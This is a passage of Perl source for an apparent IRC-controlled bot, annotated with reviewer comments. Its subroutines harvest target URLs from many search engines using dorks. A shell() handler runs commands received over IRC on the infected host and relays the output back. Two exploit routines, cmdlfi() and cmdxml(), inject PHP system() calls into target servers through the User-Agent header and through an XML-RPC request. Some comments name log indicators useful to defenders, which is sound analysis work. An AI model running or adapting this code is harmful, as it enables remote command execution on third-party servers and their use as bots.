- if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}
- while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /blekko/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub onet() { # Harvests result URLs from szukaj.onet.pl for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) { # pages 1..50; the page number is part of the path
- my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) { # every absolute http link in the page, not only result entries
- if ($1 !~ /webcache|query/){ # drop cache links and the engine's own query links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub sizuka() { # Harvests result URLs from szukacz.pl for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- my $b = 0;
- for ($b=10; $b<=100; $b+=10) { # start offsets 10..100 in steps of 10
- my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) { # the URL is read from the anchor's title attribute, not href
- if ($1 !~ /szukacz/){ # skip the engine's own links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub walla() { # Harvests result URLs from search.walla.co.il for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- my $b = 0;
- for ($b=0; $b<=50; $b+=1) { # page index p=0..50
- my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) { # each result link, without the scheme
- if ($1 !~ /walla\.co\.il/){ # skip the engine's own links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub demos() { # Harvests result URLs from search.dmoz.org for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- my $b = 0;
- for ($b=0; $b<=500; $b+=10) { # start offsets 0..500 in steps of 10, no early exit
- my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) { # every absolute http link in the page
- if ($1 !~ /search|dmoz/){ # drops any URL containing "search" or "dmoz", not only the engine's own
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub rose() { # Harvests result URLs from euroseek.com for the dork in $_[0], querying under several interface languages.
- my @list;
- my $key = $_[0]; # the search dork
- my $b = 0;
- my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
- foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))]; # one pass per entry, but $language is unused: each pass picks a random entry into the undeclared global $lang, so languages can repeat or be missed
- for ($b=0; $b<=30; $b+=10) { # start offsets 0..30 in steps of 10, per pass
- my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) { # each link carrying a class attribute, without the scheme
- if ($1 !~ /euroseek/){ # skip the engine's own links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- }return @list;
- }
- sub seznam() { # Harvests result URLs from search.seznam.cz for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- for ($b=1; $b<=500; $b+=10) { # "from" offsets 1..491 in steps of 10; $b is not declared with my here, so this is the package variable
- my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b); # pId is a fixed value hard-coded by the author
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) { # each link followed by a title attribute, without the scheme
- if ($1 !~ /seznam/){ # skip the engine's own links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub tiscali() { # Harvests result URLs from search.tiscali.it for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- for ($b=0; $b<=500; $b+=10) { # start offsets 0..500 in steps of 10; $b is not declared with my here, so this is the package variable
- my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) { # each link followed by an onclick attribute, without the scheme
- if ($1 !~ /tiscali/){ # skip the engine's own links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub naver() { # Harvests result URLs from web.search.naver.com for the dork in $_[0]; returns a flat list of URL variants.
- my @list;
- my $key = $_[0]; # the search dork
- for ($b=1; $b<=500; $b+=10) { # start offsets 1..491 in steps of 10; $b is not declared with my here, so this is the package variable
- my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0〈=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=10"); # NOTE(review): the "〈" looks like "&lang" decoded as an HTML entity when the paste was rendered - confirm against an original sample
- my $res = &search_engine_query($search); # raw response text; "" when the connection fails
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) { # every absolute http link in the page
- if ($1 !~ /naver/){ # skip the engine's own links
- my $link = $1;
- my @grep = &links($link); # three strings per hit: full link, host, parent directory
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- #########################################
- sub clean() { # Normalises and de-duplicates a list of strings, keeping the first occurrence of each in input order.
- my @cln = (); # result list
- my %visit = (); # normalised string => number of times seen
- foreach my $element (@_) { # $element aliases the caller's values, so the substitution below edits them in place
- $element =~ s/\/+/\//g; # collapse every run of slashes to a single "/"
- next if $visit{$element}++; # already seen after normalisation
- push @cln, $element;
- }
- return @cln;
- }
- sub key() { # Hand-rolled URL encoding of a search dork: returns a copy of $_[0] with a fixed set of characters replaced; anything not listed passes through unchanged.
- my $dork = $_[0]; # copy, so the caller's string is not modified
- $dork =~ s/ /\+/g; # space becomes "+", the rest become %XX escapes
- $dork =~ s/:/\%3A/g;
- $dork =~ s/\//\%2F/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/&/\%26/g;
- $dork =~ s/\"/\%22/g;
- $dork =~ s/,/\%2C/g;
- $dork =~ s/\\/\%5C/g;
- $dork =~ s/@/\%40/g;
- $dork =~ s/\[/\%5B/g;
- $dork =~ s/\]/\%5D/g;
- $dork =~ s/\?/\%3F/g; # repeats the "?" rule above; no "?" is left by this point
- $dork =~ s/\=/\%3D/g;
- $dork =~ s/\|/\%7C/g;
- return $dork;
- }
- sub links() { # Expands one scheme-less URL ("host/path/file") into three strings: the URL itself, its host, and its parent directory, each ending in "/".
- my @list;
- my $link = $_[0]; # full URL as given
- my $host = $_[0]; # reduced to the host part below
- my $hdir = $_[0]; # reduced to the parent directory below
- $hdir =~ s/(.*)\/[^\/]*$/$1/; # drop the last path segment
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; # keep the first run of host characters before a "/", discard the rest
- $host .= "/";
- $link .= "/";
- $hdir .= "/";
- $host =~ s/\/\//\//g; # collapse "//" left by appending "/" to a value that already ended in one
- $hdir =~ s/\/\//\//g;
- $link =~ s/\/\//\//g;
- push(@list,$link,$host,$hdir); # always three entries, in this order; duplicates are possible
- return @list;
- }
- sub search_engine_query($) { # Fetches one URL over a raw TCP socket on port 80 and returns the whole response as a single string, or "" on failure.
- my $url = $_[0];
- $url =~ s/http:\/\///; # strip the first "http://"
- my $host = $url;
- my $query = $url;
- my $page = ""; # stays "" if anything inside the eval fails
- $host =~ s/href=\"?http:\/\///;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; # keep the first run of host characters before a "/"
- $query =~ s/$host//; # $host is interpolated as a regex without \Q..\E, so "." matches any character; removes the first match only
- if ($query eq "") { $query = "/"; }
- eval { # errors are swallowed; $@ is never inspected
- my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; # this return leaves only the eval block; no Timeout option is passed
- print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n"; # $uagent is a global set elsewhere (presumably drawn from @uagents - confirm); for detection, the HTTP/1.0 request with exactly these three headers is a usable fingerprint of the scrape traffic
- my @pages = <$sock>; # reads until the server closes the connection
- $page = "@pages"; # list interpolation joins the lines with a space; response headers are included
- close($sock);
- };
- return $page;
- }
- #########################################
- sub shell() { # Remote command execution handler: runs $_[1] on the infected host and relays its output to the IRC target $_[0]. Any authorisation check sits in the caller, outside this view.
- my $path = $_[0]; # IRC target (channel or nick) that receives the output
- my $cmd = $_[1]; # command text, used as received
- if ($cmd =~ /cd (.*)/) { # "cd" is handled in-process so the directory change persists for later commands; the pattern is unanchored
- chdir("$1") || &msg("$path","4,1No such file or directory");
- return;
- }
- elsif ($pid = fork) { waitpid($pid, 0); } # parent only reaps the short-lived first child; $pid is an undeclared global
- else { if (fork) { exit; } else { # double fork: the grandchild is detached from the bot, so command output arrives asynchronously
- my @output = `$cmd 2>&1 3>&1`; # $cmd is handed to the shell unmodified; stderr and fd 3 are merged into the captured output
- my $c = 0;
- foreach my $output (@output) {
- $c++;
- chop $output; # removes the last character unconditionally (chop, not chomp)
- &msg("$path","$output");
- if ($c == 5) { $c = 0; sleep 2; } # pause two seconds after every five lines, presumably to avoid IRC flood limits
- }
- exit;
- }}
- }
- sub isAdmin() { # Returns 1 when the nick in $_[0] equals the configured $admin string exactly, otherwise 0.
- my $status = 0;
- my $nick = $_[0];
- if ($nick eq $admin) { $status = 1; } # case-sensitive nickname equality only; no hostmask or password check appears in this sub
- return $status;
- }
- sub msg() { # Sends one IRC PRIVMSG with text $_[1] to target $_[0].
- return unless $#_ == 1; # silently does nothing unless called with exactly two arguments
- sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); # sendraw and $IRC_cur_socket are defined outside this view; the text is not checked for embedded CR/LF here
- }
- sub nick() { # Sends an IRC NICK command requesting the nickname in $_[0].
- return unless $#_ == 0; # silently does nothing unless called with exactly one argument
- sendraw("NICK $_[0]"); # NOTE(review): no socket argument here, whereas msg() passes $IRC_cur_socket first - sendraw is defined outside this view; confirm it accepts both forms
- }
- sub notice() { # Sends one IRC NOTICE with text $_[1] to target $_[0].
- return unless $#_ == 1; # silently does nothing unless called with exactly two arguments
- sendraw("NOTICE $_[0] :$_[1]"); # NOTE(review): no socket argument here, whereas msg() passes $IRC_cur_socket first - sendraw is defined outside this view; confirm it accepts both forms
- }
- sub cmdlfi() { # Sends one GET to a target URL with PHP code carried in the User-Agent header, then relays whatever the server returned between the markers to an IRC channel.
- my $browser = LWP::UserAgent->new;
- my $url = $_[0]; # target URL; how the server comes to evaluate the header is not shown in this sub
- my $cmd = $_[1]; # command text, inserted into the payload unescaped
- my $chan = $_[2]; # IRC target for the result
- my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut"; # PHP payload framed by "j13mbut" markers; a User-Agent containing "<?system(" or "j13mbut" in web access logs is a direct indicator of this bot
- $browser->agent("$hie");
- $browser->timeout(7);
- $response = $browser->get( $url ); # $response is an undeclared global
- if ($response->content =~ /j13mbut(.*)j13mbut/s) { # greedy match across newlines between the first and last marker
- &msg("$chan","15,1(4@9CMDLFI15)9 $1");
- } else {
- &msg("$chan","15,1(4@9CMDLFI15)4 No Output"); # also reached on HTTP errors and timeouts
- }
- }
- sub cmdxml() { # Posts an XML-RPC request whose parameter carries injected PHP to a target URL, then relays whatever the server returned between the markers to an IRC channel.
- my $jed = $_[0]; # target URL of the XML-RPC endpoint
- my $dwa = $_[1]; # command text, inserted into the payload unescaped
- my $chan = $_[2]; # IRC target for the result
- my $userAgent = LWP::UserAgent->new(agent => 'perl post'); # fixed User-Agent "perl post": an indicator for log review
- $exploit = "<?xml version=\"1.0\"?><methodCall>"; # $exploit is an undeclared global
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));"; # the <name> value starts by closing a server-side string and call
- $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>"; # output is framed by "bamby" / "solo"; request bodies with test.method plus system( inside <name> are the matching detection pattern
- my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
- if ($response->content =~ /bamby(.*)solo/s) { # greedy match across newlines between the markers
- &msg("$chan","15,1(4@9CMDXML15)9 $1");
- } else {
- &msg("$chan","15,1(4@9CMDXML15)4 No Output"); # also reached on HTTP errors
- }
- }